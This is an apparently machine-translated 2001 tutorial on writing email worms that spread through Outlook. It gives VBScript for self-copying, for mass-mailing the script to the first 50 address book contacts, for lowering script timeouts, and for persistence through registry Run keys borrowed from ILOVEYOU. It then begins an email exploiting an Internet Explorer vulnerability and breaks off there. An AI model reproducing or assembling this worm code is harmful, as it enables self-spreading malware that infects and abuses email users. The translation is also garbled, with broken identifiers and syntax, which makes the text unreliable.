How to use Outlook vulnerability to write viral scripts
Http://www.tongyi.net Source: Network Click: 6189
How to use Outlook Vulnerability to Write a Virus Script Original: Coolweis (Coolweis) Source: Coolweis How to Write Worm Virus Coolweis Coolweis@NetGuard.com.cn April 6, 2001 01:22 AM Allegedly Outlook The spread of viral foot-and-mouth disease has been discovered that it seems that Microsoft can have a while. Outlook, Outlook is really notorious in transmitting viruses, like Iloveyou, Merissa, etc., viruses that have produced great destructive power are spread through Outlook. The root cause is Outlook humanization, high integration, complexity, etc. of scripts, which is due to these causes lead to the spread of viruses. Let's take a look at the mechanism of Outlook to spread viruses: first look at the major characteristics of the virus: self-replication, communication, and latent. We have a collection of self-replication. The virus to spread the self-replication by other emails or itself. The virus propagated by Outlook is basically written by vbscript. The principle of self-replication is basically using the program to copy a script content to one. Temporary files, and then send them as an accessory in the propagation link. How do we see how the script completes this feature. SET SO = CREATEOBJECT ("scripting.filesystemObject") SO.GETFILE (WScript.scriptfullName) .copy ("c: /dateiname.vbs") is such two lines to copy themselves to the root directory of DateinaMe.vbs file. The first line is to create a file system object, the second line is open this script file, wscript.scriptfullname indicates that this program itself is a complete path file name. The getFile function gets this file, the COPY function copies this file to the Dateiname.vbs of the C drive. This is a feature of most viruses written by VBScript. As you can see here, it is forbidden to control the spread of this virus. The following command can prohibit file system objects. Regsvr32 Scrrun.dll / u Let's take a look at the spread. The virus needs to spread, and the dissemination of email viruses is undoubtedly via email. For Outlook, the address book is quite good, but it also opens the door to the virus. Almost all email viruses propagated by Outlook are completed in the same script accessory with the email address stored in the address book.
Take a look at the following code: set = creteObject ("Outlook.Application") on Error Resume Next for x = 1 to 50 set mail = = teteItem (0) mail.to = Ol.getNameSpace ("MAPI"). AddressLists (1) .addressentries (x) mail.subject = "betreff der e-mail" mail.body = "text der e-mail" mail.ttachments.add ("c: /Dateina.vbs") mail.send Next OL .Quit This small segment function is to send an email to the top 50 users in the address book and use the script you as an attachment. The first line is to create an OUTLOOK object. Below is a loop, which is constantly transmitting content of the content as the email address in the address book in the loop. As for the latent, most of them are information to modify the registry to determine the various conditions and cancel some restrictions. The following example taken from Iloveyou virus part of the code: On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scripting Host / Settings / Timeout ") IF (rr> = 1) THEN wscr.regwrite" HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout ", 0," REG_DWORD "END IF is clearly the adjustment of the scripting language is set. The following piece of code is to modify the registry so that every system startup automatically execute the script: regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft /Windows/currentversion/runservices/win32dll", dirwin&"/win32dll.vbs "where MSkernel32.vbs and Win32dll.vbs are a copy of the viral script. Iloveyou viruse also made some other modifications. From the above, it can be seen that it is very simple to write an email virus propagated through Outlook. But as an attachment propagation, this propagation efficiency may be some discount. One of the following methods is based on the vulnerability of the latest IE.
Here is some of this vulnerability: from: "xxxxx" Subject: mail date: Thu, 2 Nov 2000 13:27:33 0100 Mime-Version: 1.0 Content-Type: Multipart / Related; type = "multipart / alternative" Boundary = "1" x-priority: 3 x-msmail-priority: Normal --1 Content-Type: Multipart / Alternative; Boundary = "2" --2 Content-Type: Text / HTML; Charset = "ISO- 8859-1 "Content-Transfer-Encoding: quoted-printable
head>